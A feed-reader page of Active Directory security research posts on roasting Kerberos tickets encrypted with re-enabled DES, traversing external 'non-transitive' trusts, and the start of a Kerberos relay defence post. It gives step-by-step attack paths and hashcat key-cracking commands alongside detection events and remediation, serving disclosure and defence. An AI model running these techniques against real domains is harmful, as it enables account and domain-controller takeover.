Reading view

There are new articles available, click to refresh the page.

DES Is Useful... Sometimes

Data Encryption Standard (DES) is a symmetric-key block cypher algorithm created in the 1970’s and was historically used within Active Directory (AD) environments to secure data. Most notably, DES was used as an encryption type for Kerberos tickets, although on modern environments it is disabled by default. This tweet by Steve Syfuhs mentions that DES is uninteresting and “off by default” but that got me thinking, what is involved in re-enabling it?

In this research, I’ll describe exactly how DES can be re-enabled and when it is enabled, how to use DES to takeover any AD account that isn’t krbtgt or a trust account.

Domain Controller Configuration

The main configuration required for DES to be enabled for Kerberos on a domain is at the domain controller’s level. The following GPO setting can be used to configure which encryption algorithms are supported by the DC’s, when it is applied to DC’s:

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Network security: Configure encryption types allowed for Kerberos

Figure 1: Kerberos Encryption Types GPO Setting

Ultimately this sets the following registry key:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Kerberos\parameters\SupportedEncryptionTypes

Figure 2: Kerberos Encryption Types Registry Setting

This is a bitfield where 2 represents DES-CBC-MD5. This means that the GPO setting does not need to be set for DES to be supported, this registry key only requires the bit that represent ‘2’ to be set on 1 domain controller on the domain.

The best way I’ve found to test this without the ability to query the registry for each DC is to request a TGT with a DES session key. I have modified Rubeus, which now includes the /suppenctype argument to asktgt, to make it easy to request TGT’s this way:

Figure 3: Requesting a TGT with a DES session key

Even though the TGT is encrypted with the krbtgt AES256 key, the session key is DES-CBC-MD5. It is important to note that this is possible to perform with any account without requiring any changes to the account. As shown below, there is no indication that the account supports DES in any way:

Figure 4: Account Supported Encryption Types and UAC

If the DC does not support DES-CBC-MD5, a KDC_ERR_ETYPE_NOTSUPP error is returned:

Figure 5: DES Unsupported

Cracking DES Tickets (Kerberoasting)

After understanding how DES could be enabled and how to tell if it was enabled, the next step was to understand exactly how to exploit this configuration.

The simplest example is when a service account is already configured for DES, this means has an SPN (service account) and has the useraccountcontrol (UAC) setting USE_DES_KEY_ONLY set:

Figure 6: Service account configured for DES

This makes it possible to request a service ticket (ST) for the service user des that is encrypted using DES:

Figure 7: Request DES encrypted service ticket

While the “KeyType” shown here is the session key type, which can be different to the encryption type of the ticket, the following wireshark output shows that the ticket is in fact encrypted using DES:

Figure 8: DES encrypted service ticket

Now the question was how can this be cracked? And more importantly, can the key be brute forced rather than cracking back to the plain text password? The reason this second question is more important is because if this is possible it would mean that any key can be recovered, even that of machine accounts.

To help figure out how to do this, I asked my friend Spiros Fraganastasis for help and he asked Sam Croley. Sam realised that if we knew the first block (8 bytes) of plain text, we could form a hash that would be crackable using hashcat’s mode 14000.

To form the hash, we need the initialization vector (IV), first block of cypher and first block of plain text. The IV is stored as the first 8 bytes of the cypher (after the checksum), the first block of cypher is the following 8 bytes after the IV. So, the only thing left to determine was the first block of plain text.

Dumping the decrypted enc-part for several tickets at first showed the same first block, but after more testing it was clear that this was changing a little:

Figure 9: Decrypted enc-part

Looking at this in an Asn.1 viewer it’s clear that the first 4 bytes are the header for the outer most tag, which contains the length of the data inside it (essentially the full length of the decrypted enc-part minus the length of the header (4 bytes)):

Figure 10: Application Asn.1 Tag

Similarly, the next 4 bytes is the header for a Sequence tag which contains the rest of the actual data and contains a length which is 4 bytes less than the previous length (length of the header less):

Figure 11: Sequence Asn.1 Tag

At first, I thought I could predict these values from having only the cypher, this is because the length of the plain text is always 24 bytes less than the full length of the cypher. The problem with this is after some testing, the full length of the plain text often differed from the full length of the actual data. This is because with DES the data is padded to ensure 8 byte blocks, so the plain text often had some junk padding at the end, which couldn’t be determined just from the cypher.

What I needed was a way to know with as close to 100% certainty what this first block is. After looking at the plain text again, I realised there are 3 sections which can vary in length:

Figure 12: Full enc-part Asn.1

These sections, from top to bottom, are the session key, client username (cname) and the PAC.

The session key type is determined, in large part, by the supported etypes supplied within the req-body of the request (controlled by the user requesting the ticket), the client username is determined by the TGT used to request the ticket. All that is left is the PAC, most of which is determined by the client user attributes within the AD database, the only exception is the server checksum, whose length is determined by the encryption type of the ticket (AES results in a 12 byte checksum, DES/RC4 results in a 16 byte checksum).

With all of this in mind, I realised it was possible to request a user-to-user (U2U) ticket which would match all of these requirements and result in a ticket that I could decrypt to get the first block of plain text. The session key as previously mentioned is determined by the supported etypes within the req-body of the request. The client user will be the user within the ticket granting ticket (TGT) which will be the same for the U2U request as for the service ticket request, meaning the cname along with most of the PAC will be the same (providing nothing changes for that user within AD between when the U2U ticket is requested and the DES encrypted ST is requested). And the U2U ticket encryption type (and ultimately the server checksum length within the PAC) is determined by the TGT session key, controllable when requesting the TGT.

After modifying Rubeus to return the first block of plain text when a ticket is decrypted within the DisplayTicket function, which is run when requesting a U2U ticket by default with Rubeus, we can see the plain text within the output:

Figure 13: Request U2U ticket to get plain text of first block

With knowledge of the plain text, it was now possible to form a crackable hash to brute force the DES key. This is done as follows:

CYPHER:(PLAINTEXT XOR IV)

So, imagine we have the following:

  • IV: D98C3338A9CB3626
  • CYPHER: 6C25DDEE294588FD
  • PLAINTEXT: 638203F8308203F4

We XOR the PLAINTEXT and IV, resulting in: BA0E30C0994935D2, and we end up with the following hash:

6C25DDEE294588FD:BA0E30C0994935D2

I’ve automated this into Rubeus’ describe command with the newly implemented /desplaintext argument, supplying the plain text we received from the U2U request along with the ST we requested earlier, we get back a crackable hash:

Figure 14: Rubeus describe returns crackable DES hash

Using this hash, the DES key used for encryption can be brute forced using the following hashcat command:

hashcat -a 3 -m 14000 A2CCBE7DA8A76607:94D29CF55C02153B -1 charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1

Figure 15: Crack DES key

It’s worth noting 2 things here:

  1. For the DES key cracking in this post, I’ve put the first byte in manually to reduce the cracking time length, this is because I do not have access to a powerful cracking rig to demonstrate in the post.
  2. Due to DES having a parity bit at the end of each byte, there are 16 possible usable keys, the cracking will stop when it finds the first usable key, which may not be exactly the same as the key within the AD database but will work none-the-less.

This key can then be used to request a TGT as the service user:

Figure 16: Request TGT using DES

For the sake of completion, it should be clear that with write access to an account it would be possible to perform targeted DES Kerberoasting of the account (user or computer, due to brute forcing of the key) similar to Will Schroeder’s targeted Kerberoasting with the addition of modifying the accounts UAC bit USE_DES_KEY_ONLY to allow for retrieving the DES encrypted ST as well as authenticating using the DES key, of course this bit can be removed in between these actions to cause as little disruption as possible.

It is also worth noting that once the TGT has been retrieved, the USE_DES_KEY_ONLY UAC bit can be switched off:

Figure 17: USE_DES_KEY_ONLY disabled

Even with the USE_DES_KEY_ONLY bit off, the TGT retrieved using the DES key is still usable for its lifetime:

Figure 18: Use TGT retrieved using DES key

This means the USE_DES_KEY_ONLY bit can be on for a minimum amount of time for during a targeted account hijack to make risk of detection as low as possible.

Destroying DCs

As this method of Kerberoasting allows for the recovery of any account key due to a full address space brute forcing being possible, there are 3 types of accounts for which DES encrypted ST’s cannot be retrieved, even with the USE_DES_KEY_ONLY UAC bit set. These are the krbtgt account, trust accounts (INTERDOMAIN_TRUST_ACCOUNT) and DC accounts (SERVER_TRUST_ACCOUNT).

For science, I decided to see what could be done when write access to a DC is possible, partly because this is a semi-common situation where unprivileged users are joining the servers to the domain before a domain administrator (DA) promotes it to a DC, leaving the unprivileged user as the CREATOR OWNER.

I do not advise performing this attack on a live environment as the potential to cause disruption to the infrastructure is real, but it is, however, an interesting attack path.

So, in this example, the user one has GenericWrite over the DC DC2:

Figure 19: GenericWrite permission

While GenericWrite was chosen for ease of demonstration, this will also all work with CREATOR OWNER.

For this to be a useful attack path, it is assumed all the admin accounts are protected from delegation, as shown below:

Figure 20: Administrator marked as “Sensitive and cannot be delegated”

If this was not the case, it would be possible to use Resource-Based Constrained Delegation (RBCD) to escalate. It is also assumed that PKINIT is not configured, otherwise shadow credentials could be used to escalate.

Initially the DC2 accounts UAC value is usual for a DC:

Figure 21: DC2 UAC value

Enabling the USE_DES_KEY_ONLY UAC bit:

Figure 22: Enable DES for DC2

It can be demonstrated that a DES encrypted ST cannot be requested:

Figure 23: ETYPE_NOTSUPP error

So, to exploit this SERVER_TRUST_ACCOUNT (8192) needs to be changed to WORKSTATION_TRUST_ACCOUNT (4096), to do this the UAC field can be XOR’d with 12288:

Figure 24: Downgrade DC from SERVER_WORKSTATION_ACCOUNT to WORKSTATION_TRUST_ACCOUNT

Now that the DC2 account has been downgraded to a normal workstation account, it is possible to request a DES encrypted ST:

Figure 25: Request DES encrypted ST for DC account

Request a U2U ticket to get the valid plain text of the first block (as described previously):

Figure 26: Request U2U ticket to get plain text of first block

Use Rubeus’ describe, with the /desplaintext to get the crackable DES hash:

Figure 27: Rubeus describe returns crackable DES hash

As with the user hash in the previous example, this hash can be used to brute force the DES key for the DC2 account using the following hashcat command:

hashcat -a 3 -m 14000 31812F50B7AC7122:41299994A5D5ADB3 -1 charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1

Figure 28: Brute forcing DES key

Using this DES key, a TGT can be requested for the DC2 account:

Figure 29: Request TGT for DC2 account

Now a TGT has been retrieved, DES needs to be disabled again:

Figure 30: Disable DES on the DC2 account

The DC2 account also needs to be escalated back to a SERVER_TRUST_ACCOUNT, unfortunately while this level of access grants the ability to downgrade from SERVER_TRUST_ACCOUNT to WORKSTATION_TRUST_ACCOUNT, it does not allow for the reverse:

Figure 31: Fail to escalate DC2 account

Escalation within the domain is required to escalate the DC2 account back to a SERVER_TRUST_ACCOUNT. This can be done by requesting a S4U2self ticket for DC2 as an administrative user (Administrator in this case):

Figure 32: S4U2self ticket for Administrator to DC2

This ticket can be used with impacket to DCsync the AES key for the Administrator from DC2:

Figure 33: DCsync Administrator AES key

This key can be used to request a TGT as the Administrator user:

Figure 34: Request Administrator TGT

Finally, the DC2 account can be escalated back to a SERVER_TRUST_ACCOUNT:

Figure 35: Escalate DC2 account

Again, I’d like to reiterate, I do not advise performing this attack path on a live environment. There is a LOT of room for real disruption.

DES In The Middle (TGT Session Roasting)

Anyone that was paying attention earlier and understood my previous research on AS-REQ ST’s may realise that there is another potential abuse here. In my previous post, in the section called “Proof of concept: RoastInTheMiddle” I demonstrate that it is possible to capture, modify and replay AS-REQ’s. In the section “Domain Controller Configuration” above, I showed that it is possible to request a TGT with a DES session key providing the DC supports DES and without changing the account in any way to support DES. This is done by only including the DES-CBC-MD5 etype within the req-body inside the AS-REQ.

This means if a valid AS-REQ with pre authentication can be captured, it could be modified to only include the DES-CBC-MD5 etype, replayed to a DC supporting DES which will result in a TGT with a DES session key being returned. All that is required to use this TGT is the session key. As the key used to encrypt the pre authentication data is unknown, it is not possible to decrypt the enc-part of the AS-REP to retrieve the session key and use the TGT immediately, it is possible however to request an ST that is encrypted with the TGT session key, using U2U. This is done by providing a TGT for an account for which credentials have been obtained and providing the TGT with a DES session key as the additional ticket. This will result in a ST encrypted with the DES session key but for the user of the account for which credentials have been obtained.

For example, User1’s credentials are known.

  1. Request a valid TGT for User1.
  2. Send U2U with User1’s TGT as both authentication and additional tickets to extract known plain text of first block.
  3. Man-in-the-Middle (MitM) is performed.
  4. AS-REQ for Computer1 is captured.
  5. AS-REQ modified to only include the DES-CBC-MD5 etype.
  6. Forward AS-REQ to a DC that supports DES.
  7. Extract TGT for Computer1 from AS-REP.
  8. Send U2U with User1’s TGT as the authentication ticket and Computer1’s TGT as the additional ticket to get an ST encrypted with Computer1’s TGT’s session key.
  9. Create a DES hash from U2U ST encrypted with Computer1’s TGT’s session key.
  10. Create KERB_CRED from Computer1’s TGT and known information, missing the session key.
  11. Crack the DES hash back to the TGT session key.
  12. Insert the TGT session key into the KERB_CRED.
  13. Use the TGT to authenticate as Computer1.

I modified my RoastInTheMiddle tool to perform steps 2-10 automatically:

Figure 36: RoastInTheMiddle session roasting

RoastInTheMiddle performs an ARP poison MitM of 192.168.74.13 and takes a TGT using the /tgt argument, this can be a valid TGT for any account. What it does next is shown in the following wireshark output:

Figure 37: RoastInTheMiddle wireshark output

So here, the first 2 (TGS-REQ/TGS-REP) is the initial U2U using the TGT passed in as the /tgt argument to retrieve the plaintext (displayed in the output with the line “Got usable known plain text:”).

The next 4 is a genuine authentication of the DSP computer account, normally Windows sends an AS-REQ without pre authentication first, this is to retrieve the correct salt for the key. These are passed along to the DC (192.168.74.11) as usual to avoid interrupting the authentication, but the AS-REQ that contains pre authentication is stored (this is shown in the output on the line that says “Got AS-REQ for user [email protected] to service krbtgt/DES.LAB”).

The last AS-REQ/AS-REP is the modified AS-REQ, containing only the DES-CBC-MD5 etype, being sent to a DC (192.168.74.12) and the TGT being sent back.

Lastly the U2U request is sent using the TGT passed in as the /tgt argument as the authentication ticket and the TGT retrieved in the previous step as the additional ticket is sent which results in the DC (192.168.74.12) sending back an ST encrypted with the session key of the DSP computer accounts TGT.

In the RoastInTheMiddle output above, the DES hash for the TGT session key is printed along with the KERB_CRED containing the DSP computer accounts TGT without the session key (making it currently unusable).

The next step is cracking the DES hash of the TGT session key, it is important however that this key is cracked within the lifetime of the TGT (by default 10 hours), otherwise the TGT will be unusable anyway, the following hashcat command was used for this:

hashcat -a 3 -m 14000 EF746FE49C358B28:DF4C43FC01762CA3 -1 charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1

Figure 38: TGT session key recovered

Now the session key needs to be inserted into the KERB_CRED output by RoastInTheMiddle earlier, for this I added a kirbi command to Rubeus, this command can eventually be used to manipulate KERB_CRED’s further but for now it just supports modifying/inserting a session key with the /sessionkey and /sessionetype arguments:

Figure 39: Insert session key into KERB_CRED

Lastly, this TGT can now be used to authenticate as the DSP machine account and retrieve ST’s:

Figure 40: Use TGT to request ST

DES AS-REP Roasting

Some of you may be asking “what about AS-REP Roasting?” and after essentially writing this whole post, that was the same question that I asked myself. If “AS-REP Roasting” is new to you, check out Will’s post on the topic, as I won’t be going over all of the details here.

The first step was to see if a TGT could be requested without pre authentication using the DES key:

Figure 41: Request TGT without preauth using DES key

The last thing needed is to know the first block of plain text of the enc-part within the AS-REP, the decrypted enc-part is shown below, with the first block highlighted:

Figure 42: Decrypted AS-REP enc-part

The first block this time consists of the first 3 tag headers:

Figure 43: First 3 Asn.1 Tags

Let’s look first at the third tag here (CONTEXT SPECIFIC) which is the last 2 bytes of the plain text (A0 13):

Figure 44: Context Specific Tag

Here it’s clear that A0 is the tag number for CONTEXT SPECIFIC and 13 (or 19 in decimal) is the length. This tag contains only the session key, which will always be DES-CBC-MD5, so the length will always be the same. This means the last 2 bytes of plain text will always be A0 13.

The first 3 bytes of plain text (79 81 CF) is the APPLICATION tag:

Figure 45: Application Tag

Here CF is the length of 207 which is the whole enc-part of the AS-REQ. Lastly, there is the next 3 bytes (30 81 CC), which is the SEQUENCE tag:

Figure 46: Sequence Tag

Here the length (CC or 204) is the length in the APPLICATION tag (207) minus 3 (the length of the tag header). So, the only problem with being able to predict the plain text for the first block of the enc-part of an AS-REP is the ability to predict the length of the APPLICATION tag. To see how this may be possible, let’s look at the whole enc-part:

Figure 47: AS-REP enc-part

Looking at the Asn.1 above, it’s clear that the only elements that will vary in length is the srealm and realm within the sname, everything else should remain a fixed length. With this in mind, it should be relatively easy to calculate the correct length.

The domain name used in this example is “des.lab” which is 7 characters, this means the domain name takes up 14 bytes of the enc-part. The APPLICATION tag is 207 bytes, so:

207 – 14 = 193 bytes

To request a TGT without pre authentication, the domain name has to be known, so by doing the following, the proper length of the APPLICATION tag can be calculated:

193 + (length of domain name * 2)

Then to get the length of the SEQUENCE tag, just minus 3.

Using this method, I modified Rubeus’ asreproast command to support roasting DES enabled accounts when /aes isn’t passed:

Figure 48: AS-REP Roasting using LDAP

It is also possible to manually specify the account, rather than searching LDAP and requires including the /des switch:

Figure 49: AS-REP Roast without LDAP

It’s worth noting here that /format:hashcat is required because john the ripper doesn’t support cracking this type of hash. Using the following hashcat command, it is possible to crack this hash back to the account long term DES key:

hashcat -a 3 -m 14000 3DE9FBEA34F9851B:5B1E49C5BD8A76DF -1 charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1

Figure 50: DES key cracked

This key can then be used to request a usable TGT:

Figure 51: Request TGT

Remediation/Detection

The best option to avoid these issues is to ensure that all DC’s have DES disabled in the relevant registry key:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Kerberos\parameters\SupportedEncryptionTypes

The bit that represents ‘2’ has to be off. If this is the case, no DES attacks are possible on the domain.

Windows events can also be used to detect attacks that take advantage of DES encryption. The 4769 event can detect Kerberoast attacks that request DES ST’s:

Figure 52: 4769 requesting DES ticket

The 4768 event can be used to detect both the TGT session roasting MitM as well as the AS-REP roasting attacks:

Figure 53: 4768 requesting DES encryption

Conclusion

While DES is disabled by default in AD, it is still very easy to enable and when enabled puts the whole AD infrastructure at much higher risk. It should, therefore, be of utmost importance for sysadmins to ensure that DES is fully disabled on all DCs, as only a single DC supporting DES is all that is required to enable all of these attacks.

External Trusts Are Evil

This post is duel posted on the Semperis blog.

Another day, another “by design” but clearly unintended Windows AD feature. While playing with Kerberos tickets I discovered an issue that allowed me to authenticate to other domains within a forest across external non-transitive trusts. This means that there is in fact no such thing as a “non-transitive trust”, and the description as such when creating a trust is at best misleading, leaving systems administrators with a false sense of security. After reporting this issue to Microsoft, I received the following response:

Figure 1: MSRC Response

This post details the issue discovered but as Microsoft do not feel that it affects security and as a result are not planning on fixing this issue, there is no way to avoid what is being described within this post apart from not using external trusts at all.

Trusts and Transitivity

Will Schroeder published a great post on trusts back in 2017. If you are not too familiar with the different trusts and how they work, I highly recommend reading that first as I will not be going into as much detail on the various types. For this post, I will not be discussing intra-forest trusts (trusts within a single forest) other than as they apply to the specific attack path that I am going to discuss. I also will not be discussing selective authentication trusts, but I have never actually seen these in real environments. The remaining trusts are forest trusts and external trusts. Forest trusts are trusts between two forests; or more accurately a transitive trust between the root domains of two forests, which means any user from any domain within the trusted forest can authenticate to any domain within the trusting forest. External trusts, on the other hand, are trusts between two domains and are described as being “non-transitive”, which should mean that only users within the trusted domain can authenticate against only the trusting domain.

Figure 2: External Non-Transitive Trust

Other technical differences are present between forest and external trusts, but these will be discussed if and when required for this post.

Microsoft describes trust transitivity as follows:

Transitivity determines whether a trust can be extended outside of the two domains with which it was formed.

  • A transitive trust can be used to extend trust relationships with other domains.
  • A non-transitive trust can be used to deny trust relationships with other domains.

This description is very clear. For non-transitive trusts, only the two domains involved in the trust can authenticate to each other and not beyond. As I will demonstrate in this post, this is not the case.

Lab Setup

To properly demonstrate this issue, several multi-domain forests are required with external trusts between them. I have setup the lab as follows:

Figure 3: Lab Setup

This setup involves three (3) forests, two (2) of which have three (3) domains and the other containing two (2) domains. The domains semperis.lab and treetest.lab have a bidirectional non-transitive external trust:

Figure 4: External Trust 1

The domains grandchild1.child1.semperis.lab and semperisaz.lab also have a bidirectional non-transitive external trust:

Figure 5: External Trust 2

This should make it possible to demonstrate the implications and limitations of this issue.

How Kerberos Cross-Trust Authentication Works

The main thing that is required to authenticate to a service across a trust using Kerberos is a referral (or referral TGT). This is a ticket requested from your local domain controller (DC) for the foreign domain. This section assumes a basic understanding of how the normal Kerberos authentication flow works, for a detailed explanation of that check out Sean Metcalf’s Detecting Kerberoasting Activity post. It would also be advantageous to be reasonably familiar with Rubeus (as I will be using it to request tickets in the remaining sections). This section will focus on the semperis.lab forest which is sufficient to demonstrate how ticket requests across trusts are performed, the information here is, however, applicable to any “allowed” trust path.

The simplest example of cross-trust authentication is to authenticate to a service on a domain which has a direct trust with the local domain. The trust that the domain grandchild1.child1.semperis.lab has with child1.semperis.lab, shown in Figure 5 above, is an example of this. In this situation, the first step, after obtaining the initial TGT, in obtaining a service ticket for an account in grandchild1.child1.semperis.lab to a service in child1.semperis.lab is to obtain a referral for child1.semperis.lab:

Figure 6: Referral Request For child1.semperis.lab

As shown in Figure 6 above, the request was made to a DC (SGC1DC1.grandchild1.child1.semperis.lab) within the domain (grandchild1.child1.semperis.lab) local to the authenticating user (lowpriv). The request was made for the service krbtgt/child1.semperis.lab and the fact that the ServiceRealm (srealm) is the local domain (grandchild1.child1.semperis.lab) within the resulting ticket, shows that this ticket is a referral. The diagram below shows this:

Figure 7: Referral Request

This referral can now be used to request service tickets (STs) from the foreign domain:

Figure 8: Example Usage of Referral

Here an ST was requested from the foreign DC (SC1DC1.child1.semperis.lab) for the service host/SC1DC1.child1.semperis.lab using the referral retrieved previously.

Figure 9: Requesting ST Using Referral

To take this one step further, if a service on the forest root domain (semperis.lab) is required, a referral for this domain cannot be directly requested from the local (grandchild1.child1.semperis.lab) domain:

Figure 10: Referral Request For semperis.lab

As shown in Figure 10 above, a referral for krbtgt/semperis.lab was requested from the local DC sgc1dc1.grandchild1.child1.semperis.lab. However, the ticket returned by the DC was for the service krbtgt/child1.semperis.lab, meaning that this is a referral for the domain child1.semperis.lab, NOT semperis.lab.

Figure 11: Requesting Referral For semperis.lab

This can be explicitly shown by trying to use this ticket to request a ST for the semperis.lab domain:

Figure 12: Root Domain Service Ticket Request

As shown in Figure 12 above, this results in an AP_ERR_BAD_INTEGRITY error. This is because the referral ticket is encrypted with the trust key for the grandchild1.child1.semperis.lab --> child1.semperis.lab trust. The DCs in the root domain semperis.lab do not have knowledge of this key and so are not able to decrypt the ticket.

Figure 13: Requesting ST From semperis.lab

To request a service ticket for the root domain semperis.lab, first a referral for semperis.lab must be requested from a DC in the domain child1.semperis.lab using this referral:

Figure 14: Referral Request For semperis.lab

Here a request was made to the foreign DC (sc1dc1.child1.semperis.lab) using the referral for the domain child1.semperis.lab to request a further referral for the root domain semperis.lab. It should be noted here that in order to request this ticket, the /targetdomain argument is required. This is because by default Rubeus will use the domain within the ticket passed to it to fill in the domain in the TGS-REQ, in this case that would be grandchild1.child1.semperis.lab and would result in a ERR_WRONG_REALM error as the domain local to the DC is child1.semperis.lab. This will be very important in the next section.

Figure 15: Requesting Referral For semperis.lab

Lastly, this resulting referral for semperis.lab can be used to request STs for the semperis.lab domain:

Figure 16: Service Ticket Request For semperis.lab

This ST request from the user [email protected] made to the DC SDC1.semperis.lab for the SPN host/SDC1.semperis.lab is shown in the following diagram and was successful even though the two domains involved do not have a direct trust due to the trust path being allowed:

Figure 17: ST Request For host/sdc1.semperis.lab

This method of requesting referrals for trusting domains can be followed to request STs for any service within any domain for which the trust path is “allowed”.

Making The Non-Transitive Transitive

Now that we understand how authentication across trusts happens, let’s look at how it is possible to traverse external trusts to authenticate to domains that should be prohibited.

As shown in the Figure 3, the domains semperisaz.lab and grandchild1.child1.semperis.lab have a bidirectional external trust, this means that after retrieving a TGT for any account within the domain semperisaz.lab it is possible to request a referral for grandchild1.child1.semperis.lab:

Figure 18: Referral To granchild1.child1.semperis.lab

The diagram showing this request is below:

Figure 19: Request Referral For grandchild1.child1.semperis.lab

This referral can be used to request STs for services on the domain grandchild1.child1.semperis.lab, but if we try to obtain a referral to other domains within the same forest (for example child1.semperis.lab) we get an ERR_PATH_NOT_ACCEPTED error, which is expected:

Figure 20: Path Not Accepted Error

This is because the semperisaz.lab --> granchild1.child1.semperis.lab trust is non-transitive, so the path from semperisaz.lab to child1.semperis.lab is not allowed.

Figure 21: Requesting Referral For child1.semperis.lab

However, we can request a “local” TGT for grandchild1.child1.semperis.lab:

Figure 22: Requesting “local” TGT For grandchild1.child1.semperis.lab

I call this a “local” TGT because unlike the referral, which has a ServiceRealm (srealm) of semperisaz.lab, the ServiceRealm is grandchild1.child1.semperis.lab.

Figure 23: Requesting "local" TGT

Using this “local” TGT, a referral for child1.semperis.lab can now be requested:

Figure 24: Referral For child1.semperis.lab

This process can be seen in the following diagram:

Figure 25: "local" TGT To Request Referral For child1.semperis.lab

We now have a usable referral which can be used to request STs for child1.semperis.lab using any account from the semperisaz.lab domain and without making any changes to trusts or accounts within AD. This is demonstrated below:

Figure 26: Requesting ST For DC In child1.semperis.lab

In Figure 26, a ST was requested from the DC sc1dc1.child1.semperis.lab for the service host/sc1dc1.child1.semperis.lab as the user [email protected]:

Figure 27: Requesting ST For host/sc1dc1.child1.semperis.lab

Furthermore, this method can be used to hop around any domain within the same forest that grandchild1.child1.sermperis.lab exists in. We can demonstrate this by requesting a referral to the root domain semperis.lab:

Figure 28: Requesting Referral For semperis.lab

A referral was requested for semperis.lab from the DC sc1dc1.child1.semperis.lab as the user [email protected]:

Figure 29: Requesting Referral To semperis.lab

Fortunately for security, hopping across further trusts outside of the forest (external or forest trusts) is not possible using this method. As shown in Figure 3, the root domain semperis.lab has a bidirectional external trust with treetest.lab, this trust can be used to demonstrate that limitation:

Figure 30: Requesting Referral For treetest.lab

This at least stops an attacker using this method of trust hopping from hopping into another forest.

Figure 31: Requesting Referral For treetest.lab

This issue is clearly useful for attackers trying to elevate privileges within a forest from across a trust. Other than being able to query domain information from domains that systems administrators may think would be disallowed (and query more sensitive domains or potentially domains with weaker security), this also makes it possible to perform attacks such as Kerberoasting or NTLM authentication coercion on domains that may seem to be disallowed.

Hopping Further

While it is not possible to hop further using this specific method, I did write a post a while ago about the ability to create machine accounts across trusts and that this may open up new avenues of attack for attackers. This situation is another example of that.

Using the referral retrieved for semperis.lab, it is possible to request a ticket for the LDAP service on a DC in semperis.lab:

Figure 32: Request ST For LDAP

Here a ST for ldap/sdc1.semperis.lab was requested using the referral for semperis.lab as the user [email protected]:

Figure 33: Request ST For ldap/sdc1.semperis.lab

This ST can be injected and used to create a machine account directly in semperis.lab (given the configuration allows Authenticated Users, as is default):

Figure 34: Create Machine Account In semperis.lab

This causes the DC sdc1.semperis.lab to create the machine account TestComp within the semperis.lab domain:

Figure 35: Create Machine Account TestComp

This newly created TestComp machine account is a local account within the domain semperis.lab. Now that we have a machine account that exists within semperis.lab, we can retrieve a TGT for that account:

Figure 36: Machine Account TGT

Requesting the machine account TGT looks as follows:

Figure 37: Requesting TGT For TestComp

This machine account TGT is allowed to request a referral to the trusting domain treetest.lab:

Figure 38: Requesting Referral For treetest.lab

Here the machine account’s TGT was used to request a referral for the treetest.lab domain from the DC SDC1.semperis.lab:

Figure 39: Request Referral For treetest.lab

Lastly, the issue described in this post can again be used to gain access to the inaccessible dsptest.lab domain. First by requesting a “local” TGT for treetest.lab:

Figure 40: Requesting Local TGT For treetest.lab

The “local” TGT is requested using the referral for treetest.lab as the account [email protected] from the DC TDC1.treetest.lab:

Figure 41: Requesting "local" TGT For treetest.lab

Then using this “local” TGT to request a referral for dsptest.lab:

Figure 42: Requesting Referral For dsptest.lab

Here a referral was requested for the domain dsptest.lab from the DC TDC1.treetest.lab as the user [email protected]:

Figure 43: Requesting Referral For dsptest.lab

It should be clear that using the combination of these two methods would make it possible to hop very deep into AD enterprise infrastructures, using any low privileged account on a domain which has an external trust to any domain within a forest.

Detection

Unfortunately, the only way to prevent this attack path is to remove external trusts completely. If this is not possible, detection is possible. The relevant Windows events are 4769’s (A Kerberos service ticket was requested). The first indication is that a “local” TGT is requested from an account in a different forest:

Figure 44: 4769 For Local TGT

Here the Account Domain field is a domain that belongs to a different forest and the Service Name is krbtgt. This event is followed by another 4769 requesting a referral:

Figure 45: 4769 For Referral

Here the Account Domain is a domain within a different forest and the Service Name is another domain within the local forest.

It is worth noting that these two events can be on different DCs within the same domain, they do not have to reside on the same DC. At this point, any service tickets requested (4769’s) using this referral will have an Account Domain that contains a domain that should not be allowed to authenticate to the local domain.

Plans to consume these events and detect this attack are planned for an upcoming release of Directory Services Protector (DSP).

Conclusion

The biggest problem here is Microsoft’s description of non-transitive trusts being, at best, misleading to systems administrators. This problem is exaggerated by Microsoft’s refusal to accept that this affects security. As it stands, by creating an external “non-transitive” trust, companies must accept that any account within the trusted domain can authenticate against any domain within the whole forest where the trusting domain resides.

As demonstrated above, in the “Hopping Further” section of this post, this research again highlights the importance of disallowing Authenticated Users from being able to create machine accounts, as not doing so not only puts domains within the forest at a higher risk, but also puts any domains (and the whole forest within which they reside) which have an external trust with any domain within the forest at a higher risk. This is due to the ability to create machine account across trusts, even while using the technique used within this blog post to authenticate against domains which should be disallowed. More information on the machine account quota and how to prevent low privileged machine account creation can be found on Kevin Robertson’s excellent post “MachineAccountQuota is USEFUL Sometimes”.

If nothing else, I hope this blog post informs systems administrators of the real forest-wide risk involved in implementing external trusts. Afterall, how can systems administrators be expected to properly secure their environments while thinking authentication is not possible where it actually is.

Timeline

  • 2022/05/04 – MSRC case created.
  • 2022/05/12 – Case status changed to “Review/Repro”.
  • 2022/06/17 – Case status changed to “Develop” with email that stated "We confirmed the behavior you reported. We'll continue our investigation and determine how to address this issue."
  • 2022/06/17 – Case status changed to “Complete – Resolved”.
  • 2022/08/24 – Comment left on case to find out the status.
  • 2022/09/02 – A follow-up comment left on case to find out the status.
  • 2022/09/14 – A follow-up email sent to find out the status of the case.
  • 2022/09/29 – Email received explaining the issue was not determined to affect security.
  • 2023/03/14 – Public disclosure - Blog post released.

Acknowledgements

Defending the Three Headed Relay

A joint blog written by Andrew Schwartz, Charlie Clark, and Jonny Johnson

Introduction

For the past couple of weeks it has become apparent that Kerberos Relaying has set off to be one of the hottest topics of discussion for the InfoSec community. Although this attack isn’t new and was discovered months ago by James Forshaw, it has recently taken off because a new tool called KrbRelayUp has come to surface that takes James’ work and automates that process for anyone wanting to exploit this activity. This tool however doesn’t only exploit James’ work, but also work from Elad Shamir around S4U2Self/S4U2Proxy, while using code from Rubeus by Will Schroeder. We as a group (Andrew, Charlie, and Jonny) found this interesting as we saw many detections coming out for “Kerberos Relay” that might not actually detect “Kerberos Relay” if the action was performed by itself, but more of post-exploitation actions — say in the S4U activity.

During this blog post we will take a look into Kerberos Relay, break out the different attack paths one could take, and talk about the different defensive opportunities tied to this activity and other activities leading up to Kerberos Relay or after.

Kerberos Relay Explained

